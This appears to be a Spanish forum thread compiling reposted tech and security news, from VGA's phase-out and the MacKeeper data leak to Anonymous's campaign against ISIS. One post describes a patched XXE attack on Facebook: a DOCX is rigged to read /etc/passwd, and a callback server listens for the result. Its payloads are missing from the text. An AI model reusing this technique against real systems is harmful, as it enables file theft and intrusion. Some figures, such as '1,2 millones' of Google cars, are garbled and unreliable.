¿Tienes un monitor VGA? Pues cuídalo porque más temprano que tarde podría convertirse en una de esas curiosas reliquias informáticas. Cuando Intel comenzó a desvelar detalles sobre su nueva familia de procesadores ya dieron datos al respecto, pero no prestamos demasiada atención y es algo curioso: Skylake ya no da soporte para puertos VGA.


Los tradicionales puertos de conexión a nuestros monitores han quedado desplazados por los monitores con estándares más recientes como DVI, HDMI o DisplayPort -y sus distintas variantes en conectores mini y micro-, pero hasta ahora los fabricantes habían seguido manteniendo ese puerto por el soporte que seguían dándole los grandes de los semiconductores. Ahora las cosas empiezan a cambiar.

VGA se despide, DVI lo hará pronto

La conexión VGA (Video Graphics Array) lleva ya mucho tiempo con nosotros:** se diseñó en 1987** y se convirtió rápidamente en el estándar de facto en la industria del PC que emergía de forma contundente en aquella década. El conector D-sub 15 con el que todos lo identificamos ha sido uno de los más extendidos en la industria, pero la evolución de esa misma industria ha hecho que hayan ido surgiendo diversas alternativas.



Los conectores DVI (Digital Visual Interface) fueron los sucesores de referencia de los puertos VGA, y durante mucho tiempo hemos visto -y seguiremos viendo, en realidad- productos que combinaban ambas opciones. Sin embargo esto será cada vez menos común, ya que la citada familia de procesadores Skylake de Intel ya no ofrece soporte para conectores VGA y de hecho su sucesor, DVI, también tiene los días contados ante el empuje de estándares más preparados para estos tiempos como HDMI y DisplayPort.


Aún veremos esta tecnología rondar nuestras vidas, eso seguro: hay muchos dispositivos que cuentan con este tipo de conexión, y la multitud de adaptadores que permiten convertir entre puertos DisplayPort, HDMI o DVI a VGA -en todas esas combinaciones- son una realidad patente que nos permiten seguir sacando jugo a esos dispositivos. Aún hay algo de vida para el puerto VGA, sí, pero los nuevos tiempos se imponen: es ley de vida.


FUENTE| xataka

Un grupo de hackers amenaza con repetir los ataques del año pasado a PSN y Xbox Live estas Navidades.



Durante las Navidades del año pasado PlayStation Network y Xbox Live sufrieron un ataque por parte de Lizard Squad, unos hackers que impidieron disfrutar de los servicios online de las consolas de Microsoft y Sony.

Ahora, el grupo de hackers Phantom Squad ha amenazado con volver a repetir el mismo ataque para estas Navidades. Del mismo modo, buscan atacar los servidores de Grand Theft Auto V, Star Wars: The Old Republic y Call of Duty: Black Ops 3.

Lizard Squad realizó el ataque el año pasado para obligar a las compañías a reforzar sus sistemas de seguridad, mientras que Phantom Squad asegura que los va a realizar para demostrar que "la ciberseguridad no existe".

Nos tocará esperar a la semana que viene para comprobar si podremos disfrutar de unas Navidades tranquilas jugando online o se volverá a repetir la misma situación del año pasado.


FUENTE| No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Sí es antiguo y está parcheado, busqué por el foro y no encontré un post al respecto. Como prueba de concepto para los q no lo vimos me parece correcto.

Un saludo.

La gente últimamente esta deseada en obtener mucha información de su victima por facebook bueno aquí le traigo un aporte sobre eso.

Facebook Seguridad Tough:

Facebook como ustedes saben es bastante seguro, debido a que muchas personas  informan errores de seguridad muy graves desde 2010 y se reparó un XML entidad externa (peligroso XXE) Procesamiento de vulnerabilidad  que afecta OpenID  a finales de 2013.

Dijeron que todos sus servidores están parcheado de acuerdo con este mensaje por su equipo de seguridad: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El desafio:

Al final y no voy a encontrar vulnerabilidades xx después de que Facebook parcho sus servidores con la herramienta Takedown, desarrollaron pero yo desafié a mí mismo para encontrar XXE en Facebook y después de algún tiempo la excavación y la caza, me encontré con esta URL:  https: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El Hack:

Traté de subir mi CV y fui aceptado y subido con éxito pero  sólo puedo cargar archivos PDF y DOCX pero ya sé que los archivos .docx son archivos XML comprimidos desarrollados por Microsoft, según wikipedia:  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta /wiki/Office_Open_XML

Simplemente abrí MS Word 2010 después escribí un texto al azar y la guardé en mi escritorio como: CV.docx después de que he subido con éxito a Facebook y  pasó como esperaba pero debe encontrar una vulnerabilidad.

La inyección de carga útil XML dentro CV.docx leer /etc/passwd:

Rápidamente me abrí CV.docx con el programa 7zip en Windows 7 y extraje todo el contenido del archivo CV.docx entonces encontré algunos archivos xml después de eso decidí abrir este archivo: [Content_Types] .xml e inserte el código XML inocente:




El Evil Twin:

Ya tengo otro archivo ext.dtd esperando en mohaab007 directorio y aquí es el contenido de ext.dtd:




El programa de instalación:

Ahora tengo un archivo CV.docx forjado y está listo para el rock después de eso me abrió el puerto 80 en mi router a casa y comencé con python  http servidor:

mohamed:~ mohaab007$ sudo python -m SimpleHTTPServer 80

Password:

Serving HTTP on 0.0.0.0 port 80 ...

El susto:

Inserté mi dirección IP externa y todo lo que quiero ver es una respuesta del servidor http python diciendo que algo está intentando conectarse a mí. Ahora todo está bien y luego he subido CV.docx a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  y espere un minuto, pero no paso nada.

Me dije a mí mismo que es un fracaso total y voy a revisar mi perfil de Facebook  y charlar con algunos amigos y jugar a un juego o algo así después de este largo FALLADO  intento. Perdí unos 15 minutos, charlando y navegando,  pero ahora es el momento de dejar el servidor http python,  Facebook y todo.

Iba a cerrar mi ventana de terminal y me sorprendí al ver que algo relacionado a mi servidor http python:




El impacto:



Dije WOOOOOOT   Forcé un servidor que pertenece a Facebook para conectar con el servidor HTTP de Python usando una manera disimulada y ahora puedo HACER:



1- DoS en el sistema de análisis por lo que es abierta,  e.g.No tienes permitido ver los links. Registrarse o Entrar a mi cuenta | No tienes permitido ver los links. Registrarse o Entrar a mi cuenta | file://c:/con/con

2- Escanea TCP utilizando entidades externas HTTP (incluyendo firewalls desde los servidores de aplicaciones a menudo tienen la visión mundial diferente de la del atacante)

3- El acceso no autorizado a los datos almacenados como archivos XML en el sistema de archivos del sistema de análisis (por supuesto, el atacante aún necesita una manera de obtener estos datos de nuevo)

4- DoS en otros sistemas (si se permite que el sistema de análisis de establecimiento TCP conexiones con otros sistemas)

5- NTLM robo de material de la autenticación mediante el inicio de acceso a archivos UNC a los sistemas bajo control atacante (descabellada?)

6- Una aplicación ampliamente desplegado y altamente conectado vulnerables a este ataque puede ser utilizado para ataques DDoS.

7-   Leer  sistema y archivos de la aplicación y, en algunos casos, ejecutar comandos de sistema utilizando php expect:// wrapper.



FUENTE| No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

La empresa antivirus MacKeeper sufrió una brecha de seguridad y se ha tenido acceso a su base de datos con más de 13 millones de clientes incluyendo nombres, direcciones de correo electrónico, nombres de usuario, hashes de contraseñas, direcciones IP, números de teléfono y información del sistema.

MacKeeper es una suite de software creada por la empresa Kromtech, que pretende hacer más seguro y estable el sistema operativo de Apple. La violación de datos fue descubierta por Chris Vickery, un investigador que fue capaz de descargar los 13 millones de registros de clientes con un total de 21 GB de datos.

Vickery dijo que descubrió "el tesoro" de MacKeeper en un momento de aburrimiento mientras buscaba datos abiertamente accesibles en Shodan. "El motor de búsqueda había indexado sus IPs [de MacKeeper] porque estaba ejecutando una instancia de MongoDB con acceso público en el puerto 27017".
Debido a esta mala configuración de MongoDB, cuatro direcciones IPs llevaron a Vickery directamente a una base de datos MongoDB, que contiene una variedad de información personal de los clientes de MacKeeper.



Aunque las contraseñas están cifradas, Vickery cree que MacKeeper utilizaba MD5 para proteger las contraseñas del cliente, permitiendo que cualquiera pueda descifrarlas en segundos utilizando herramientas de cracking.

La empresa respondió a Vickery, diciendo que no tenían ninguna evidencia de que los datos hayan sido utilizados de forma malintencionada. Aunque la empresa afirma que Vickery fue la única persona que pudo acceder a los usuarios de MacKeeper, se recomienda cambiar las contraseñas.


FUENTE| No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una de las mayores preocupaciones de los internautas está relacionada directamente con los casos de espionaje masivo que se han producido en los últimos tiempos. ¿Me están espiando? Es una pregunta bastante frecuente que se hacen los usuarios y que ahora podrán responder de forma realmente sencilla gracias a una herramienta gratuita.

SpyDetect Free es una herramienta para Windows que permite contestar dos simples preguntas "¿Estoy siendo espiado?" y "¿Estoy siendo rastreado (monitorizado)?". Sus creadores nos explican que su principal propósito es detectar procesos que puedan estar comprometiendo la privacidad de nuestros datos. Y es que existen numerosas formas de rastrear a los usuarios, desde funciones propias del sistema operativo hasta aplicaciones maliciosas que camuflan sistemas de espionaje. Todas ellas se pueden detectar con esta herramienta.

Esta herramienta, que podremos descargar en versiones de 32 y 64 bit, está diseñada para responder de forma sencilla a las cuestiones que preocupan a los usuarios. Al ejecutarla, nos encontramos con una interfaz muy despejada coronada con un gran botón bajo el texto "Check Now" (Comprobar ahora) que en unos 60 segundos responde más abajo a las dos cuestiones principales.

"¿Estoy siendo espiado?" y "¿Estoy siendo rastreado?" son las preguntas que podremos responder de forma sencilla con esta herramienta. Para la primera pregunta, se controlará la existencia de procesos que controlen lo que estamos tecleando en tiempo real. En cuanto al rastreo, se analizará el software presente en el equipo para ver si alguno envía información periódica sobre lo que hacemos.

Aunque no se trata de la solución definitiva, sí es una forma muy rápida de detectar una gran mayoría de procesos que pueden estar espiando nuestro ordenador con Windows. Esta herramienta se une a otras que tenemos en el mercado.


FUENTE| adslzone

Si hay una tema que genera encendidos debates entre los aficionados a la tecnología, sin duda es el enfrentamiento entre Android e iOS. Son dos sistemas operativos móviles ya muy maduros, y hoy vamos a conocer 10 motivos por las que Android es mejor que iOS. Desde luego, argumentos a favor de la plataforma de Google no nos van a faltar.

No podemos negar que el iPhone ha sido el dispositivo que definió el smartphone moderno, pero Android ha retocado y mejorado hasta el último detalle. En muchos aspectos, podemos decir que el alumno ha superado al maestro. Así que conozcamos los 10 motivos por las que Android es mejor que iOS detallados uno por uno:


10 aspectos mejores en Android que en iOS

- Apps externas: en iOS resulta bastante complicado cargar aplicaciones de fuera de la tienda oficial, y requiere modificar el sistema. En Android disponemos de la enorme libertad de poder usar programas ajenos a Google Play, lo que permite encontrar casi cualquier app que podamos imaginar.

- Personalización: sin necesidad de procesos complicados o de perder la garantía, podemos personalizar profundamente el sistema operativo, tanto en su aspecto como en funcionalidades. Al final, la versatilidad es mucho mayor.

- Notificaciones: la verdad es que Android siempre ha destacado en las notificaciones, y su sistema sigue por delante del de iOS, a pesar de que Apple ha copiado varias veces a Google. Pero Android se mantiene a la cabeza, cada vez con más ideas nuevas, una razón por la que Android supera a iOS.

- Aplicaciones de Google: en Android tenemos las mejores versiones de Gmail, Maps, Fotos, Drive o Chrome. Los servicios que ofrece Google son muy buenos, así que resulta interesante poder disfrutarlos en las mejores condiciones posibles.

- Hardware variado: iOS sólo soporta unos pocos dispositivos carísimos que vende Apple, pero Android se incluye en cientos de modelos distintos. Eso significa que tenemos más fácil encontrar el aparato adecuado para nosotros, y a mejor precio, gracias a la competencia entre las marcas.

- Apps gratis: las apps en iOS pueden resultar a veces un poco mejores, e incluso este sistema cuenta con exclusivas. Pero en Android los programas son más baratos en general, o incluso gratuitos. Así que se trata de un motivo claro por el que Android es mejor que iOS.

- Software libre: Android ofrece buena parte de su código de forma abierta, lo que permite que nazcan otros proyectos muy destacados, como Fire OS, el sistema operativo de las tablets de Amazon. Todos salimos ganando con esta generosa política.

- Material Design: creo que este es el aspecto más polémico de la lista, pero no me resisto a mencionarlo. El diseño Material Design de Android me parece realmente atractivo e intuitivo, mucho más que el aburrido aspecto de iOS 9.

- Respeto a los estándares: Android soporta cargadores microUSB y los nuevos USB Type-C, también USB OTG para usar memorias USB, tarjetas microSD, batería extraíble, vídeo inalámbrico DNLA... Apple siempre apuesta por lo propietario, lo que genera incomodidades y gastos extra.

- Dispositivos punteros: si echamos un vistazo a las especificaciones de los smartphones y tablets con Android veremos las razones por las que es mejor iOS. Siempre son más avanzadas que las de los iPhone e iPad. Puede que esto se debe en realidad a la tacañería de Apple, pero representa una limitación para iOS.

Así que ya conocemos 10 motivos por las que Android es mejor que iOS. No queremos decir que el sistema operativo de Apple sea un desastre, pero tampoco podemos negar que sufre carencias graves que debería resolver de forma urgente.


¿ Y tú qué opinas?


FUENTE| No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Le pones un disco de buen tamaño si no lo tiene, y lo dedicas para hacer copias de seguridad en red por ejemplo.

Un saludo.

Aonymous le declaró "guerra cibernética" al grupo que se hace llamar Estado Islámico (EI) , para vengar lo ocurrido el viernes en París.

La organización de ciberactivistas prometió lanzar la "operación más grande" jamás realizada contra el grupo extremista en internet .

" Los ataques (de París) no pueden quedar impunes, por eso Anonymous de todo el mundo os vamos a dar caza", aseguró un individuo cubierto con la característica máscara de la organización, en un video difundido por internet.

"Esperad ciberataques, se ha declarado la guerra. El pueblo francés es más fuerte que vosotros y saldrá fortalecido de esta atrocidad", agregó.

El vídeo, difundido a través de YouTube, tiene una duración total de dos minutos y medio y concluye con el sonido de las primeras declaraciones del presidente francés, François Hollande, tras conocerse los atentados.

Hollande sobre los ataques en París: "Francia está en guerra" "Sí, alimañas asesinas de inocentes, vamos a ir a por vosotros. Ya lo estábamos haciendo desde los ataques a Charlie Hebdo. Vamos a encontraros y no os dejaremos huir", agrega el representante de Anonymous.

"Operación Estado Islámico"

En su video, el portavoz enmascarado también asegura que ya comenzaron su campaña contra los yihadistas en enero de 2015, cuando se produjeron los atentados contra la revista satírica Charlie Hedbo.

De hecho, poco después, en marzo, la organización publicó una lista con 9.200 cuentas de Twitter vinculadas, según los ciberactivistas, a simpatizantes de la organización extremista.



Según un informe de Foreign Policy, hasta el momento, los hacktivistas han logrado "desarmar" más 100.000 cuentas de Twitter, 149 páginas web y casi 6.000 videos propagandísticos relacionados con EI.

Y durante más de un año, voluntarios ocasionales y programadores experimentados han estado sumidos en esta batalla cibernética contra el grupo islamista radical y sus seguidores; una lucha que ha aumentado significativamente, tanto en frecuencia como en visibilidad, en los últimos nueve meses.

Muchos de estos piratas informáticos, la gran mayoría de ellos (aunque no todos) vinculados a Anonymous, trabajan desde diversas partes del mundo y provienen de ámbitos muy diferentes.

No tienen mucho en común, excepto la pasión por la informática y el objetivo de atacar a los extremistas como parte de una campaña global que han denominado #OpISIS (operación Estado Islámico).

Pero, a pesar de la meta común, algunas opiniones dentro del colectivo se encuentran divididas en torno a una pregunta: si Anonymous defiende el uso de internet sin restricciones, ¿debería esta garantía aplicarse a todo el mundo, incluidos los miembros de organizaciones radicales?

En debates públicos y privados en el ciberespacio, algunos autoproclamados miembros de Anonymous luchan por reconciliar las voces del colectivo, reza el informe de Foreign Policy.

Mientras tanto, la "guerra cibernética" contra EI ya se ha puesto en marcha. Pero, ¿hasta qué punto es significativa esta lucha en el ciberespacio? Los límites entre la propaganda de guerra y la libertad de expresión

Estado Islámico utiliza ampliamente internet, ya sea para propaganda viral, en labores de reclutamiento o para comunicaciones entre los simpatizantes del grupo extremista. Twitter comenzó siendo la red social más utilizada por excelencia, ya que les permitía difundir su torrente propagandístico sin complicaciones.

El año pasado, en su avance en Mosul, Irak, los extremistas difundieron mensajes en esta red social con el hashtag #AllEyesOnISIS, saturando al mundo con un video en el que asesinaban al periodista norteamericano James Foley, para después difundir también otras ejecuciones de activistas y periodistas occidentales.



Otra etiqueta en la misma red social, #AMessageFromISISToUS, provocó una lluvia de mensajes entre norteamericanos y militantes de EI. Durante meses, Twitter tuvo problemas para conciliar su política de libertad de expresión con su nuevo papel como herramienta propagandística de parte de los extremistas en todo el mundo.

Pero eventualmente la red social tomó medidas, eliminando algunas cuentas: el 2 de abril suspendió 10.000 cuentas directamente relacionadas con EI y aumentó algunas medidas de seguridad. Aun así, los yihadistas mantuvieron su robusta presencia en la red social.

Y algunos de sus usuarios lograron burlar las nuevas medidas de Twitter: la cuenta de Asawitiri Media, por ejemplo, fue relanzada hasta 122 veces, obteniendo 10.000 nuevos seguidores en tan sólo 24 horas.

Sin embargo, en muchos casos el cierre repetido de las cuentas llevó a los extremistas a distribuir su propaganda a través de una nueva plataforma: la aplicación de mensajería móvil Telegram, que es considerada una de las más seguras.

Por qué Telegram es la aplicación preferida por Estado Islámico

La organización utiliza ampliamente ambas plataformas, tanto Twitter como Telegram. Pero expertos sostienen que algunas operaciones de EI en redes sociales están siendo manejadas por contratistas y voluntarios desde diversos lugares el mundo, y quizás lejos de los territorios ocupados en Siria e Irak.

Los hacktivistas también han invertido grandes esfuerzos en destruir las nuevas páginas web del grupo para difundir noticias y recaudar donaciones para el grupo extremista.

"Si podemos romper sus canales de comunicación tendrán menos fuerza", dijo a Foreign Policy @DigitaShadow, uno de los hacktivistas.

Y otra de las campañas en contra de EI en Internet -y una de las más surrealistas- es el personaje de anime ISIS-chan, que comenzó tras el rapto y ejecución de los japoneses Haruna Yukawa y Kenji Goto en enero de 2015.

ISIS-chan es un personaje de ficción que pretende "perturbar la propaganda de Estado Islámico en internet", a través de un personaje del manga "Moé", cuyo objetivo es "traer la paz y los melones" a los miembros de la organización extremista y enseñarles que "los cuchillos son para cortar fruta, no para la violencia".

Pero una guerra cibernética va más allá de la interrupción de la difusión de los mensajes propagandísticos.

¿Contraproducente para la seguridad?

Efectivamente, a lucha cibernética contra Estado Islámico también se ha expandido al espionaje y a los servicios de inteligencia.

Piratas informáticos de GhostSec, una organización formada en gran parte por exmiembros de Anonymous, que también luchan contra EI, se infiltran en foros yihadistas con el objetivo de descifrar las ubicaciones y direcciones electrónicas de los ciberyihadistas. Esta información es después enviada al servicio de inteligencia estadounidense.

La respuesta está en el hacker. En un principio, éstos enviaban información a direcciones al azar vinculadas con el gobierno estadounidense, pero después se asociaron con terceros para comunicar sus mensajes a los servicios de inteligencia de manera más eficiente.

Es por ello por lo que algunos expertos en seguridad consideran que la declaración de guerra de Anonymous podría ser "contraproducente".

Según declaró a AFP el experto en ciberseguridad Olivier Laurelli, la "guerra" declarada de Anonymous a EI "podría interferir en los esfuerzos de la policía a la hora de identificar a los miembros de EI y seguirles la pista".

"El cierre de esas cuentas hará que los investigadores policiales queden sordos y ciegos para muchas cosas", explicó Laurelli. Es interesante, por ejemplo, saber qué cuentas están activas en Francia, Siria o Irak", dijo.

"Poder identificar las conexiones y comunicaciones entre individuos es también fundamental, pero si Anonymous elimina esos vínculos, los investigadores llegarán a un callejón sin salida".

Nueva amenaza: ciberataques mortales

Por otra parte, según acaba de anunciar el ministro de finanzas británico George Osborne, los extremistas están tratando de desarrollar la capacidad de crear ciberataques mortales en el Reino Unido.

Según Osborne, los hackers islamistas pretenden hacerse con el control del suministro eléctrico de la nación, así como el control del tráfico aéreo y hospitales. De acuerdo con el ministro, EI ya ha demostrado su capacidad para "explotar internet con horribles fines propagandísticos", incluida la radicalización y la planificación de operaciones.

Pero el canciller británico advirtió que los yihadistas pretenden ahora apoderarse de las infraestructuras británicas para arrebatar vidas. "Desde nuestros bancos hasta nuestros coches, militares o escuelas. Todo lo que esté en internet es un objetivo", afirmó.

Osborne también aseguró que "los yihadistas todavía no cuentan con la capacidad para lograr algo así, pero sabemos que es lo que quieren hacer y estamos adoptando todas las medidas para evitarlo".

Ante la amenaza, el gobierno británico ha aumentado la seguridad y anunciado la contratación de más especialistas y cerca de 2.000 agentes de inteligencia. Además, Osborne anunció la creación de un nuevo Centro Nacional de Ciberseguridad que permita reunir a los mejores expertos del país.

Por su parte, Francia también anunció más inversión en equipos armados y movilizó a 115.000 oficiales de seguridad, según declaró el ministro del Interior Bernad Cazeneuve.


FUENTE| lanacion

Un agente de la policía de Mountain View (California, Estados Unidos), detuvo uno de los coches sin conductor de Google por circular a una velocidad demasiado lenta.

El gigante del buscador cuenta ya con 1,2 millones de Google Cars o coches sin conductor en circulación sin embargo ya se ha llevado el primer "susto" cuando un agente de la policía cercano a su propia sede dio el alto a uno de estos coche por circular con "excesiva prudencia".

La zona en cuestión tiene marcado un límite de velocidad de 56 kilómetros por hora, según relatan en La Voz de Galicia, sin embargo el coche de Google estaba circulando a 38 km/h, algo que a este policía le resultó contraproducente así que decidió detener el coche.

Por suerte un técnico de Google se encontraba por las inmediaciones y finalmente, la multa que este agente le había puesto, no fue cursada.

Desde Google explican que la razón por la que sus coche sin conductor circulan a una velocidad tan moderada es totalmente intencionada, se debe a motivos de seguridad, es decir, evitar que se produzca cualquier tipo de accidente y así con ello que la población no acabe percibiéndolos como un peligro.

En la actualizad circulan en torno a 1,2 millones de estos coches sin conductor que, según ha explicado Google, equivalen a 90 años de experiencia al volante.

Por supuesto, Google también ha aprovechado la ocasión para bromear en su red social sobre este anecdótico incidente: "a los humanos no les mandan detenerse por eso tantas veces".


Fuente| googlelizados

Buenas hice un vídeo hace tiempo sobre eso y lo colgué en mi nueva cuenta de youtube, espero poder ayudarte.

AndroTotal es un interesante servicio web gratuito donde podremos analizar APKs en busca de amenazas. Podemos comparar el servicio al de VirusTotal o al de Metascan, ya que entre sus utilidades se encuentra la de analizar los archivos con diferentes motores Antivirus pero que están especializados en el sistema Android.

A continuación comparto con vosotros algunas capturas de pantalla de una muestra de APK de Whatsapp que he descargado de un Black Market y que he pasado por el analizador:



Andrototal también nos permite ver los permisos, datos del paquete, actividades, etc. Aquí hay más información de cómo analizar APK con PHP.

Por otro lado, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, es un interesante sitio web que nos permite analizar un binario en busca de actividades sospechosas. Se pueden analizar binarios de forma gratuita, aunque el servicio no es inmediato, y puede tardar algunas horas en finalizar el proceso, en función del número de análisis que tengan en cola.


ANDROTOTAL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
REVERSE.IT : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

FUENTE|blog.segu-info.com.ar

Puede que seas un ciberdelincuente... pero todavía no lo sabes. ¿Alguna vez has espiado el móvil de tu pareja? ¿Has grabado a alguien sin su consentimiento? ¿O has hecho una "inocente" broma telefónica haciéndote pasar por otra persona? Sigue leyendo, esto puede interesarte.

El número de ciberataques están en aumento. Como indican todos los informes, la cantidad de ataque informáticos y ciberdelitos, tanto dirigidos a empresas como a usuarios, no deja de crecer. Los motivos son variados, pero por lo general el objetivo de los criminales es obtener dinero a través de ellos. Pero... ¿puede un cibercriminal no saber que está cometiendo un delito en la red? Sí, tú podrías ser uno de ellos. Seguramente no te estés lucrando por ello, pero podrías estar cometiendo delitos graves penados por la ley. La firma de peritaje informático Aldama Informática Legal ha elaborado una lista de los delitos informáticos más comunes que cometen los usuarios, ya sea por desconocimiento de la ley o por descuido.



Espiar el móvil de tu pareja.

¿Cuántas parejas se habrán roto gracias a una "pillada" por un mensaje o un e-mail? "Inocentemente" coges el móvil de tu pareja y revisas los mensajes... O se deja el portátil encendido y le echas un vistacito a su email. Pues ya has cometido un delito. Leer los e-mails, WhatsApp o mensajes de otras personas (aunque sea tu pareja, o un familiar), atenta contra uno de los derechos básicos: el secreto de las comunicaciones y la intimidad. Si además se usa para algún fin (como demostrar una infidelidad), puede acarrear incluso penas de prisión. Y no es una teoría, sino que ha ocurrido recientemente: una sentencia condenó a un hombre a prisión por espiar el móvil de su pareja. Demostró la infidelidad, sí, pero cometió un delito para hacerlo.

Grabar sin consentimiento.

Para empezar, hay que aclarar que es ilegal grabar a otra persona sin su consentimiento. En un momento en el que sacamos la cámara del móvil a la mínima de cambio, hay que tener cuidado. Obviamente, no estamos hablando de fotos inocentes: casos como grabar a tu pareja siéndote infiel, filmar escenas de cibersexo o guardar fotos íntimas sin consentimiento, son considerados delitos que pueden incurrir en multas o incluso penas de cárcel.

Suplantación de identidad.

Cuidado con gastar bromitas en la red, pueden salirte caras. Hacerte pasar por otra persona (aunque sea un conocido) en las redes sociales, mensajes, chats o llamadas puede ponerte en un aprieto. Eso sí, por lo general se considera un delito cuando se busca un provecho mediante esa suplantación. Pero según alertan desde Aldama, han tenido casos de denuncias por suplantación ante grupos de conocidos. Ándate con ojo, una broma de mal gusto puede sentarle mal a alguien.

Amenazas en redes sociales.

Resulta bastante obvio, no se debe amenazar ni insultar a nadie (en general), y tampoco en las redes sociales. No son pocas las veces que artistas, políticos o usuarios bocazas en las redes sociales publican posts que son una provocación al insulto o la amenaza. Pero respira profundamente tres veces y piénsatelo antes de responder o comentar. Hay que ser responsable con lo que se publica en la red, tiene consecuencias ante la justicia.

Revelar secretos.

Todos tenemos secretos, y compartimos secretos de otras personas. Y es probable que alguna vez hayas pensado en publicar más de uno cuando alguien te ha hecho una "jugarreta". Pero cuidado, publicar un secreto o intimidad de una persona a través de las redes sociales o por mensajes, aunque sea un amigo, se considera un delito si no hay consentimiento.

Acoso en Internet.

En algunas ocasiones, incluso para la justicia, es difícil trazar la línea entre lo que se considera acoso y lo que no. Para ti pueden ser una serie de mensajes amorosos inocentes... para la otra persona puede ser un acoso sexual. Tenlo presente a la hora de enviar mensajes, emails... Puedes traspasar la línea y convertirte en un delincuente informático.

Contenido pedófilo.

Tú nunca has descargado contenido pedófilo. Pero... ¿has descargado películas o series a través de la red? Esto de por sí es ilegal, pero uno de los delitos más graves que se pueden cometer sin darse cuenta es descargar material de internet y que dentro haya contenido pedófilo sin que nos demos cuenta. Un caso muy grave que en el mayoría de los casos el usuario no tiene conocimiento de que está almacenando o distribuyendo algo completamente ilegal. Eso sí, un perito informático puede demostrar si los documentos han sido visionados o no, y si se tenía conocimiento de su existencia.

Como explica Carlos Aldama, "es muy común incurrir en delitos informáticos sin saberlo. La descarga de películas o música no es legal y, sin embargo, encontramos a muchos usuarios que además de descargar este tipo de archivos, también los están compartiendo, sin saber que son los responsables de la distribución de material protegido".

¿Consejos? Conocer cuáles son los delitos, para no cometerlos, y usar el sentido común a la hora de navegar por la red y usar sus servicios. Seguro que muchos de estos delitos digitales los conocías... Otra cosa es que miraras hacia otro lado. Pero si los cometes, de nada te servirá decir que no sabías que eran delito. Avisado estás.



FUENTE| globbsecurity

Como ya sabemos (y se han encargado de demostrarnos), prácticamente cualquier sistema es susceptible de ser atacado. Dispositivos, infraestructuras críticas, coches... Gasolineras. Si, este era uno de los siguientes pasos lógicos. Por eso, el equipo de investigación de la firma de seguridad Trend Micro ha puesto a prueba la seguridad de los sistemas automatizados de los tanques de combustible.

Y es que, la manipulación de estos tanques podría resultar muy peligrosa. No solo por la volatilidad del combustible y la peligrosidad física que un ataque así podría implicar, sino por las implicaciones de tocar la fibra sensible a uno de los sectores económicos más potentes como es el petrolífero. Pero este sector no está exento de riesgos (ninguno lo esté) y menos ahora que cada vez más compañías petroleras usan sistemas conectados a la red para controlar sus tanques.

Manipular los tanques para convertirlos en riesgos para la seguridad pública.

En la prueba realizada por Trend Micro, usaron un honeypot personalizado al que han denominado GasPot. Con él, podían saber cómo los atacantes explotaban el sistema y qué objetivos eran sus preferidos. Como esperaban, los honeypots localizados en Estados Unidos han sido los favoritos de los ciberdelincuentes.

Los ataques que se pueden realizar depende de la sofisticación de los sistemas de control que están instalados en los tanques. Los más simples sólo permiten el acceso al estado del sistema, pero los más complejos permiten acceder al control de los tanques y su manipulación.

Pero, ¿qué implicaciones podría tener esto? Los ataques dependen de las motivaciones de los posibles atacantes: desde simples actos de vandalismo, hasta ataques más sofisticados y maliciosos, como modificar el comportamiento de los tanques, lo que les podría convertir en potenciales riesgos para la seguridad pública.

La solución es un desafío cuando las infraestructuras están conectadas a la red

Siempre es complicado aplicar parches cuando los sistemas y las infraestructuras están conectadas a Internet. En el caso de los sistemas SCADA, según la información que se puede manejar en estos momentos, todo sugiere que las organizaciones no están preparadas todavía para parchear este tipo de sistemas. Según el informe de 2013 de la Agencia Europea de Seguridad para la Red y Seguridad de la Información (ENISA), menos del 20% de las organizaciones se preocupó por instalar los parches ICS / SCADA que sus proveedores les proporcionaban.

Según explican desde Trend Micro, en el mundo del software de consumo, esto no sería aceptable. Pero sobra decir que la seguridad de este tipo de dispositivos y sistemas es prioritaria.

La firma de seguridad ha lanzado el estudio "Experimento GasPot: peligros no examinados en el uso de sistemas de control de depósitos de gasolina"  que puede ser visitado para conocer más detalles de este proyecto.


FUENTE| globbsecurity

El Blackphone, un dispositivo Android especialmente diseñado para proteger tu privacidad de los hackers y los espías del gobierno, tuvo tanto éxito que ya existe el Blackphone 2.

Silent Circle, el fabricante del teléfono, presentó su smartphone de segunda generación el lunes 28 de septiembre. Cuesta 799 dólares (unos 13,500 pesos).

Por fuera parece que es un smartphone de gama alta como cualquier otro. Tiene una pantalla de 5.5 pulgadas, dos cámaras (13 megapixeles en la trasera y cinco en la frontal), 32 gigabytes de memoria interna y un poderoso procesador Qualcomm.

Pero la magia está en su interior. Tiene funciones de privacidad incluidas que superan por mucho a los dispositivos de Apple, Microsoft o Samsung.

Si te importa más que nada la privacidad, este probablemente es el teléfono adecuado para ti.

Su principal atractivo es el "centro de seguridad" del teléfono, en donde los usuarios pueden seleccionar a detalle exactamente qué información puede compartir el teléfono con cada aplicación.

Las aplicaciones (ya sean mapas, juegos o redes sociales) son famosas por registrar datos sumamente personales y por compartirlos discretamente con empresas de publicidad y otros negocios.

Los dispositivos Android y los iPhones te permiten que controles algunos "permisos", tales como impedir que una aplicación registre tu ubicación. Sin embargo, el Blackphone te deja que veas cada cosa que recaba una aplicación, incluso el sonido que registra a través de tu micrófono.

Te sorprenderías con lo que encontrarías.

También está la plataforma de comunicación integrada sumamente privada del Blackphone. Todos los demás teléfonos celulares hacen las llamadas telefónicas comunes a través de la red celular. Eso significa que los operadores de las redes, tales como AT&T y Verizon, pueden ver quién llama a quién y los gobiernos pueden entrar en esas redes para escuchar.

Los Blackphones cuentan con un software especial que cifra las llamadas telefónicas y los mensajes de texto. Ese servicio es gratuito el primer año y después cuesta 25 dólares (unos 425 pesos) al año.

El Blackphone 2 también tiene "espacios" independientes que esencialmente te permiten que tengas teléfonos completamente diferentes con grados de privacidad variables en el mismo dispositivo. Con unos cuantos clics, puedes cambiar rápidamente de la función de teléfono común (con rastreo o envío de datos promedio) a un teléfono superprivado ideal para un espía (todo está cifrado y se bloquean todas las aplicaciones).

